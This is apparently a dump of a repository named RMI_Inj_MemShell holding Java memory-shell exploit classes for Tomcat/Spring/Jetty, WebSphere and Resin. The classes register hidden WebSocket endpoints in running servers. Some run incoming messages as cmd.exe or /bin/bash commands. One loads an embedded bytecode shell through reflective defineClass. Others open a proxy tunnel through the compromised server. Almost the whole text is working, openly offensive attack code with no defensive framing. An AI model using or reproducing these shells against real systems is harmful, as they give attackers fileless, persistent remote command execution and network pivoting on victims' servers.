9 | import javax.servlet.*;
10 | import javax.websocket.Endpoint;
11 | import javax.websocket.EndpointConfig;
12 | import javax.websocket.MessageHandler;
13 | import javax.websocket.Session;
14 | import javax.websocket.server.ServerContainer;
15 | import javax.websocket.server.ServerEndpointConfig;
16 |
17 | public final class WebSocket_Proxy extends Endpoint implements MessageHandler.Whole,CompletionHandler {
18 |
19 | private Session session;
20 | private String Pwd;
21 | private String path;
22 | private String secretKey;
23 | private HashMap parameterMap;
24 | private ServletConfig servletConfig;
25 | private ServletContext servletContext;
26 | final ByteBuffer buffer = ByteBuffer.allocate(102400);
27 | private AsynchronousSocketChannel client = null;
28 | long i = 0;
29 | ByteArrayOutputStream baos = new ByteArrayOutputStream();
30 | HashMap map = new HashMap();
31 |
32 | public WebSocket_Proxy() {}
33 |
34 |
35 | public boolean equals(Object obj) {
36 | try {
37 | this.parameterMap = (HashMap)obj;
38 | this.servletContext = (ServletContext)this.parameterMap.get("servletContext");
39 | this.Pwd = get("pwd");
40 | this.path = get("path");
41 | this.secretKey = get("secretKey");
42 | } catch (Exception e) {
43 | e.printStackTrace();
44 | return false;
45 | }
46 | return true;
47 | }
48 |
49 | public String toString() {
50 | this.parameterMap.put("result", addWs().getBytes());
51 | this.parameterMap = null;
52 | return "";
53 | }
54 |
55 | public String addWs() {
56 | ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(this.getClass(), this.path).build();
57 | ServletContext x = (ServletContext) this.servletContext;
58 | ServerContainer container = (ServerContainer) x.getAttribute(ServerContainer.class.getName());
59 | try {
60 | if (x.getAttribute(this.path) == null){
61 | container.addEndpoint(configEndpoint);
62 | x.setAttribute(this.path,this.path);
63 | return "success";
64 | } else {
65 | return "path err";
66 | }
67 | } catch (Exception ignored) {
68 | }
69 | return "fail";
70 | }
71 |
72 | @Override
73 | public void onMessage(ByteBuffer message) {
74 | try {
75 | message.clear();
76 | i++;
77 | process(message,session);
78 | } catch (Exception ignored) {
79 | }
80 | }
81 |
82 | @Override
83 | public void completed(Integer result, final Session channel) {
84 | buffer.clear();
85 | try {
86 | if(buffer.hasRemaining() && result>=0)
87 | {
88 | byte[] arr = new byte[result];
89 | ByteBuffer b = buffer.get(arr,0,result);
90 | baos.write(arr,0,result);
91 | ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
92 | if (channel.isOpen()) {
93 | channel.getBasicRemote().sendBinary(q);
94 | }
95 | baos = new ByteArrayOutputStream();
96 | readFromServer(channel,client);
97 | }else{
98 | if(result > 0)
99 | {
100 | byte[] arr = new byte[result];
101 | ByteBuffer b = buffer.get(arr,0,result);
102 | baos.write(arr,0,result);
103 | readFromServer(channel,client);
104 | }
105 | }
106 | } catch (Exception ignored) {
107 | }
108 | }
109 | @Override
110 | public void failed(Throwable t, Session channel) {t.printStackTrace();}
111 |
112 | void readFromServer(Session channel,final AsynchronousSocketChannel client){
113 | this.client = client;
114 | buffer.clear();
115 | client.read(buffer, channel, this);
116 | }
117 |
118 |
119 | void process(ByteBuffer z,Session channel)
120 | {
121 | try{
122 | if(i>1)
123 | {
124 | AsynchronousSocketChannel client = map.get(channel.getId());
125 | client.write(z).get();
126 | readFromServer(channel,client);
127 | }
128 | else if(i==1)
129 | {
130 | String values = new String(z.array());
131 | String[] array = values.split(" ");
132 | String[] addrarray = array[1].split(":");
133 | AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
134 | int po = Integer.parseInt(addrarray[1]);
135 | InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
136 | Future future = client.connect(hostAddress);
137 | try {
138 | future.get(10, TimeUnit.SECONDS);
139 | } catch(Exception ignored){
140 | channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
141 | return;
142 | }
143 | map.put(channel.getId(), client);
144 | readFromServer(channel,client);
145 | channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
146 | }
147 | }catch(Exception ignored){
148 | }
149 | }
150 | @Override
151 | public void onOpen(final Session session, EndpointConfig config) {
152 | this.i = 0;
153 | this.session = session;
154 | session.setMaxBinaryMessageBufferSize(1024*1024*1024);
155 | session.setMaxTextMessageBufferSize(1024*1024*1024);
156 | session.addMessageHandler(this);
157 | }
158 |
159 | public void init(ServletConfig paramServletConfig) throws ServletException {
160 | this.servletConfig = paramServletConfig;
161 | }
162 |
163 | public ServletConfig getServletConfig() {
164 | return this.servletConfig;
165 | }
166 |
167 | public String getServletInfo() {
168 | return "";
169 | }
170 |
171 | public void destroy() {}
172 |
173 | public String get(String key) {
174 | try {
175 | return new String((byte[])this.parameterMap.get(key));
176 | } catch (Exception e) {
177 | return null;
178 | }
179 | }
180 | }
181 |
--------------------------------------------------------------------------------
/lib/exploit/websocket/Tomcat_Spring_Jetty/WsCmd.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/Tomcat_Spring_Jetty/WsCmd.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/Tomcat_Spring_Jetty/WsCmd.java:
--------------------------------------------------------------------------------
1 | import org.apache.catalina.core.StandardContext;
2 | import org.apache.catalina.loader.WebappClassLoaderBase;
3 | import org.apache.catalina.webresources.StandardRoot;
4 | import org.apache.tomcat.websocket.server.WsServerContainer;
5 | import javax.websocket.DeploymentException;
6 | import javax.websocket.server.ServerContainer;
7 | import javax.websocket.server.ServerEndpointConfig;
8 | import java.lang.reflect.Field;
9 | import java.lang.reflect.Method;
10 |
11 | public class WsCmd {
12 | static {
13 | try {
14 | String urlPath = "/cmd";
15 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
16 | StandardRoot standardroot = (StandardRoot) webappClassLoaderBase.getResources();
17 | if (standardroot == null){
18 | Field field;
19 | try {
20 | field = webappClassLoaderBase.getClass().getDeclaredField("resources");
21 | field.setAccessible(true);
22 | }catch (Exception e){
23 | field = webappClassLoaderBase.getClass().getSuperclass().getDeclaredField("resources");
24 | field.setAccessible(true);
25 | }
26 | standardroot = (StandardRoot)field.get(webappClassLoaderBase);
27 | }
28 | StandardContext standardContext = (StandardContext) standardroot.getContext();
29 | ClassLoader cl = Thread.currentThread().getContextClassLoader();
30 | Class clazz;
31 | byte[] bytes = new byte[]{-54, -2, -70, -66, 0, 0, 0, 49, 0, 118, 10, 0, 30, 0, 46, 8, 0, 47, 10, 0, 48, 0, 49, 10, 0, 8, 0, 50, 8, 0, 51, 10, 0, 8, 0, 52, 10, 0, 53, 0, 54, 7, 0, 55, 8, 0, 56, 8, 0, 57, 10, 0, 53, 0, 58, 8, 0, 59, 8, 0, 60, 10, 0, 61, 0, 62, 7, 0, 63, 10, 0, 15, 0, 46, 10, 0, 64, 0, 65, 10, 0, 15, 0, 66, 10, 0, 64, 0, 67, 10, 0, 61, 0, 68, 9, 0, 29, 0, 69, 11, 0, 70, 0, 71, 10, 0, 15, 0, 72, 11, 0, 73, 0, 74, 7, 0, 75, 10, 0, 25, 0, 76, 11, 0, 70, 0, 77, 10, 0, 29, 0, 78, 7, 0, 79, 7, 0, 80, 7, 0, 82, 1, 0, 7, 115, 101, 115, 115, 105, 111, 110, 1, 0, 25, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 9, 111, 110, 77, 101, 115, 115, 97, 103, 101, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 6, 111, 110, 79, 112, 101, 110, 1, 0, 60, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 41, 86, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 86, 1, 0, 9, 83, 105, 103, 110, 97, 116, 117, 114, 101, 1, 0, 5, 87, 104, 111, 108, 101, 1, 0, 12, 73, 110, 110, 101, 114, 67, 108, 97, 115, 115, 101, 115, 1, 0, 84, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 60, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 62, 59, 12, 0, 34, 0, 35, 1, 0, 7, 111, 115, 46, 110, 97, 109, 101, 7, 0, 83, 12, 0, 84, 0, 85, 12, 0, 86, 0, 87, 1, 0, 7, 119, 105, 110, 100, 111, 119, 115, 12, 0, 88, 0, 89, 7, 0, 90, 12, 0, 91, 0, 92, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 7, 99, 109, 100, 46, 101, 120, 101, 1, 0, 2, 47, 99, 12, 0, 93, 0, 94, 1, 0, 9, 47, 98, 105, 110, 47, 98, 97, 115, 104, 1, 0, 2, 45, 99, 7, 0, 95, 12, 0, 96, 0, 97, 1, 0, 23, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 7, 0, 98, 12, 0, 99, 0, 100, 12, 0, 101, 0, 102, 12, 0, 103, 0, 35, 12, 0, 104, 0, 100, 12, 0, 32, 0, 33, 7, 0, 105, 12, 0, 106, 0, 108, 12, 0, 109, 0, 87, 7, 0, 111, 12, 0, 112, 0, 38, 1, 0, 19, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 113, 0, 35, 12, 0, 114, 0, 115, 12, 0, 37, 0, 38, 1, 0, 10, 87, 101, 98, 83, 111, 99, 107, 101, 116, 67, 1, 0, 24, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 7, 0, 116, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 11, 116, 111, 76, 111, 119, 101, 114, 67, 97, 115, 101, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 115, 116, 97, 114, 116, 115, 87, 105, 116, 104, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 90, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 40, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 4, 114, 101, 97, 100, 1, 0, 3, 40, 41, 73, 1, 0, 6, 97, 112, 112, 101, 110, 100, 1, 0, 28, 40, 67, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 5, 99, 108, 111, 115, 101, 1, 0, 7, 119, 97, 105, 116, 70, 111, 114, 1, 0, 23, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 1, 0, 14, 103, 101, 116, 66, 97, 115, 105, 99, 82, 101, 109, 111, 116, 101, 1, 0, 5, 66, 97, 115, 105, 99, 1, 0, 40, 40, 41, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 59, 1, 0, 8, 116, 111, 83, 116, 114, 105, 110, 103, 7, 0, 117, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 1, 0, 8, 115, 101, 110, 100, 84, 101, 120, 116, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 17, 97, 100, 100, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 35, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 0, 33, 0, 29, 0, 30, 0, 1, 0, 31, 0, 1, 0, 2, 0, 32, 0, 33, 0, 0, 0, 4, 0, 1, 0, 34, 0, 35, 0, 1, 0, 36, 0, 0, 0, 17, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 0, 0, 1, 0, 37, 0, 38, 0, 1, 0, 36, 0, 0, 0, -88, 0, 5, 0, 7, 0, 0, 0, -108, 18, 2, -72, 0, 3, -74, 0, 4, 18, 5, -74, 0, 6, 62, 29, -103, 0, 31, -72, 0, 7, 6, -67, 0, 8, 89, 3, 18, 9, 83, 89, 4, 18, 10, 83, 89, 5, 43, 83, -74, 0, 11, 77, -89, 0, 28, -72, 0, 7, 6, -67, 0, 8, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 11, 77, 44, -74, 0, 14, 58, 4, -69, 0, 15, 89, -73, 0, 16, 58, 5, 25, 4, -74, 0, 17, 89, 54, 6, 2, -97, 0, 15, 25, 5, 21, 6, -110, -74, 0, 18, 87, -89, -1, -21, 25, 4, -74, 0, 19, 44, -74, 0, 20, 87, 42, -76, 0, 21, -71, 0, 22, 1, 0, 25, 5, -74, 0, 23, -71, 0, 24, 2, 0, -89, 0, 8, 77, 44, -74, 0, 26, -79, 0, 1, 0, 0, 0, -117, 0, -114, 0, 25, 0, 0, 0, 1, 0, 39, 0, 40, 0, 1, 0, 36, 0, 0, 0, 25, 0, 2, 0, 3, 0, 0, 0, 13, 42, 43, -75, 0, 21, 43, 42, -71, 0, 27, 2, 0, -79, 0, 0, 0, 0, 16, 65, 0, 37, 0, 41, 0, 1, 0, 36, 0, 0, 0, 21, 0, 2, 0, 2, 0, 0, 0, 9, 42, 43, -64, 0, 8, -74, 0, 28, -79, 0, 0, 0, 0, 0, 2, 0, 42, 0, 0, 0, 2, 0, 45, 0, 44, 0, 0, 0, 18, 0, 2, 0, 31, 0, 81, 0, 43, 6, 9, 0, 73, 0, 110, 0, 107, 6, 9};
32 | Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
33 | method.setAccessible(true);
34 | clazz = (Class) method.invoke(cl, bytes, 0, bytes.length);
35 | ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(clazz, urlPath).build();
36 | WsServerContainer container = (WsServerContainer) standardContext.getServletContext().getAttribute(ServerContainer.class.getName());
37 | if (null == container.findMapping(urlPath)) {
38 | try {
39 | container.addEndpoint(configEndpoint);
40 | } catch (DeploymentException e) {
41 | e.printStackTrace();
42 | }
43 | }
44 | } catch (Exception e) {
45 | e.printStackTrace();
46 | }
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/lib/exploit/websocket/WebSphere/ProxyEndpoint$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/WebSphere/ProxyEndpoint$1.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/WebSphere/ProxyEndpoint$2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/WebSphere/ProxyEndpoint$2.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/WebSphere/ProxyEndpoint$Attach.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/WebSphere/ProxyEndpoint$Attach.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/WebSphere/ProxyEndpoint.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/WebSphere/ProxyEndpoint.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/WebSphere/ProxyEndpoint.java:
--------------------------------------------------------------------------------
1 | import javax.servlet.ServletContext;
2 | import javax.servlet.http.HttpServletRequest;
3 | import javax.servlet.http.HttpServletResponse;
4 | import javax.websocket.server.ServerEndpointConfig;
5 | import javax.websocket.*;
6 | import java.io.*;
7 | import java.nio.channels.AsynchronousSocketChannel;
8 | import java.util.HashMap;
9 | import java.nio.ByteBuffer;
10 | import java.nio.channels.CompletionHandler;
11 | import java.net.InetSocketAddress;
12 | import java.util.concurrent.TimeUnit;
13 | import java.util.concurrent.Future;
14 | import com.ibm.websphere.wsoc.WsWsocServerContainer;
15 | import java.lang.reflect.Field;
16 |
17 | public class ProxyEndpoint extends Endpoint {
18 | long i =0;
19 | ByteArrayOutputStream baos = new ByteArrayOutputStream();
20 | HashMap map = new HashMap();
21 | static class Attach {
22 | public AsynchronousSocketChannel client;
23 | public Session channel;
24 | }
25 | void readFromServer(Session channel,AsynchronousSocketChannel client){
26 | final ByteBuffer buffer = ByteBuffer.allocate(102400);
27 | Attach attach = new Attach();
28 | attach.client = client;
29 | attach.channel = channel;
30 | client.read(buffer, attach, new CompletionHandler() {
31 | @Override
32 | public void completed(Integer result, final Attach scAttachment) {
33 | buffer.clear();
34 | try {
35 | if(buffer.hasRemaining() && result>=0)
36 | {
37 | byte[] arr = new byte[result];
38 | ByteBuffer b = buffer.get(arr,0,result);
39 | baos.write(arr,0,result);
40 | ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
41 | if (scAttachment.channel.isOpen()) {
42 | scAttachment.channel.getBasicRemote().sendBinary(q);
43 | }
44 | baos = new ByteArrayOutputStream();
45 | readFromServer(scAttachment.channel,scAttachment.client);
46 | }else{
47 | if(result > 0)
48 | {
49 | byte[] arr = new byte[result];
50 | ByteBuffer b = buffer.get(arr,0,result);
51 | baos.write(arr,0,result);
52 | readFromServer(scAttachment.channel,scAttachment.client);
53 | }
54 | }
55 | } catch (Exception ignored) {}
56 | }
57 | @Override
58 | public void failed(Throwable t, Attach scAttachment) {t.printStackTrace();}
59 | });
60 | }
61 | void process(ByteBuffer z,Session channel)
62 | {
63 | try{
64 | if(i>1)
65 | {
66 | AsynchronousSocketChannel client = map.get(channel.getId());
67 | client.write(z).get();
68 | z.flip();
69 | z.clear();
70 | }
71 | else if(i==1)
72 | {
73 | String values = new String(z.array());
74 | String[] array = values.split(" ");
75 | String[] addrarray = array[1].split(":");
76 | AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
77 | int po = Integer.parseInt(addrarray[1]);
78 | InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
79 | Future future = client.connect(hostAddress);
80 | try {
81 | future.get(10, TimeUnit.SECONDS);
82 | } catch(Exception ignored){
83 | channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
84 | return;
85 | }
86 | map.put(channel.getId(), client);
87 | readFromServer(channel,client);
88 | channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
89 | }
90 | }catch(Exception ignored){
91 | }
92 | }
93 | @Override
94 | public void onOpen(final Session session, EndpointConfig config) {
95 | i=0;
96 | session.setMaxBinaryMessageBufferSize(1024*1024*20);
97 | session.setMaxTextMessageBufferSize(1024*1024*20);
98 | session.addMessageHandler(new MessageHandler.Whole() {
99 | @Override
100 | public void onMessage(ByteBuffer message) {
101 | try {
102 | message.clear();
103 | i++;
104 | process(message,session);
105 | } catch (Exception ignored) {
106 | }
107 | }
108 | });
109 | }
110 | static {
111 | HttpServletRequest request = null;
112 | HttpServletResponse response = null;
113 | PrintWriter out = null;
114 | try {
115 | out = response.getWriter();
116 | } catch (IOException e) {
117 | e.printStackTrace();
118 | }
119 | String path = request.getParameter("path");
120 | ServletContext servletContext = request.getSession().getServletContext();
121 | ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(ProxyEndpoint.class, path).build();
122 | WsWsocServerContainer container = (WsWsocServerContainer) servletContext.getAttribute("javax.websocket.server.ServerContainer");
123 | Field name = null;
124 | try {
125 | name = container.getClass().getDeclaredField("noMoreAdds");
126 | name.setAccessible(true);
127 | name.setBoolean(container, false);
128 | try {
129 | if (servletContext.getAttribute(path) == null){
130 | container.addEndpoint(configEndpoint);
131 | servletContext.setAttribute(path,path);
132 | }
133 | out.println("success, connect url path: " + servletContext.getContextPath() + path);
134 | out.flush();
135 | out.close();
136 | } catch (Exception e) {
137 | out.println(e.toString());
138 | out.flush();
139 | out.close();
140 | }
141 | } catch (Exception e) {
142 | out.println(e.toString());
143 | out.flush();
144 | out.close();
145 | }
146 | }
147 | }
148 |
--------------------------------------------------------------------------------
/lib/exploit/websocket/WebSphere/WebsphereEndpoint.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/WebSphere/WebsphereEndpoint.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/WebSphere/WebsphereEndpoint.java:
--------------------------------------------------------------------------------
1 | import com.ibm.websphere.wsoc.WsWsocServerContainer;
2 | import javax.servlet.ServletContext;
3 | import javax.servlet.http.HttpServletRequest;
4 | import javax.servlet.http.HttpServletResponse;
5 | import javax.websocket.server.ServerEndpointConfig;
6 | import javax.websocket.*;
7 | import java.io.*;
8 | import java.lang.reflect.Field;
9 |
10 | public class WebsphereEndpoint extends Endpoint implements MessageHandler.Whole {
11 | private Session session;
12 |
13 | @Override
14 | public void onMessage(String s) {
15 | try {
16 | Process process;
17 | boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
18 | if (bool) {
19 | process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s });
20 | } else {
21 | process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s });
22 | }
23 | InputStream inputStream = process.getInputStream();
24 | StringBuilder stringBuilder = new StringBuilder();
25 | int i;
26 | while ((i = inputStream.read()) != -1)
27 | stringBuilder.append((char)i);
28 | inputStream.close();
29 | process.waitFor();
30 | session.getBasicRemote().sendText(stringBuilder.toString());
31 | } catch (Exception exception) {
32 | exception.printStackTrace();
33 | }
34 | }
35 | @Override
36 | public void onOpen(final Session session, EndpointConfig config) {
37 | this.session = session;
38 | session.addMessageHandler(this);
39 | }
40 |
41 | static {
42 | HttpServletRequest request =null;
43 | HttpServletResponse response = null;
44 | PrintWriter out = null;
45 | try {
46 | out = response.getWriter();
47 | } catch (IOException e) {
48 | e.printStackTrace();
49 | }
50 | String path = request.getParameter("path");
51 | ServletContext servletContext = request.getSession().getServletContext();
52 | ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(WebsphereEndpoint.class, path).build();
53 | WsWsocServerContainer container = (WsWsocServerContainer) servletContext.getAttribute("javax.websocket.server.ServerContainer");
54 | Field name = null;
55 | try {
56 | name = container.getClass().getDeclaredField("noMoreAdds");
57 | name.setAccessible(true);
58 | name.setBoolean(container, false);
59 | try {
60 | if (servletContext.getAttribute(path) == null){
61 | container.addEndpoint(configEndpoint);
62 | servletContext.setAttribute(path,path);
63 | }
64 | out.println("success, connect url path: " + servletContext.getContextPath() + path);
65 | out.flush();
66 | out.close();
67 | } catch (Exception e) {
68 | out.println(e.toString());
69 | out.flush();
70 | out.close();
71 | }
72 | } catch (Exception e) {
73 | out.println(e.toString());
74 | out.flush();
75 | out.close();
76 | }
77 | }
78 | }
79 |
--------------------------------------------------------------------------------
/lib/exploit/websocket/resin/CmdListener.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/resin/CmdListener.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/resin/CmdListener.java:
--------------------------------------------------------------------------------
1 | import com.caucho.websocket.WebSocketListener;
2 | import com.caucho.websocket.WebSocketServletRequest;
3 | import com.caucho.websocket.WebSocketContext;
4 | import javax.servlet.http.HttpServletRequest;
5 | import javax.servlet.http.HttpServletResponse;
6 | import java.io.IOException;
7 | import java.io.InputStream;
8 | import java.io.Reader;
9 | import java.io.PrintWriter;
10 |
11 | public class CmdListener implements WebSocketListener {
12 | static {
13 | HttpServletRequest request = null;
14 | HttpServletResponse response=null;
15 | String protocol=request.getHeader("Upgrade");
16 | if(!"websocket".equals(protocol)){
17 | PrintWriter out = null;
18 | try {
19 | out = response.getWriter();
20 | out.println("not websocket");
21 | out.flush();
22 | out.close();
23 | } catch (IOException e) {
24 | e.printStackTrace();
25 | }
26 | }
27 | WebSocketListener listener=new CmdListener();
28 | WebSocketServletRequest wsReq=(WebSocketServletRequest)request;
29 | try {
30 | wsReq.startWebSocket(listener);
31 | } catch (IOException e) {
32 | e.printStackTrace();
33 | }
34 | }
35 | public void onReadText(WebSocketContext context, Reader is) throws IOException {
36 | StringBuilder sb = new StringBuilder();
37 | int ch;
38 | while ((ch = is.read()) >= 0) {
39 | sb.append((char) ch);
40 | }
41 | try {
42 | Process process;
43 | boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
44 | if (bool) {
45 | process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", sb.toString()});
46 | } else {
47 | process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", sb.toString()});
48 | }
49 | InputStream inputStream = process.getInputStream();
50 | StringBuilder stringBuilder = new StringBuilder();
51 | int i;
52 | while ((i = inputStream.read()) != -1)
53 | stringBuilder.append((char) i);
54 | inputStream.close();
55 | process.waitFor();
56 | PrintWriter writer = context.startTextMessage();
57 | writer.print(stringBuilder);
58 | writer.close();
59 | } catch (Exception ignored) {
60 | }
61 | }
62 |
63 | public void onStart(WebSocketContext context) throws IOException {
64 | }
65 |
66 | public void onReadBinary(WebSocketContext context, InputStream is) throws IOException {
67 | }
68 |
69 | public void onClose(WebSocketContext context) throws IOException {
70 | }
71 |
72 | public void onDisconnect(WebSocketContext context) throws IOException {
73 | }
74 |
75 | public void onTimeout(WebSocketContext context) throws IOException {
76 | }
77 | }
78 |
--------------------------------------------------------------------------------
/lib/web/web.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/web/web.jar
--------------------------------------------------------------------------------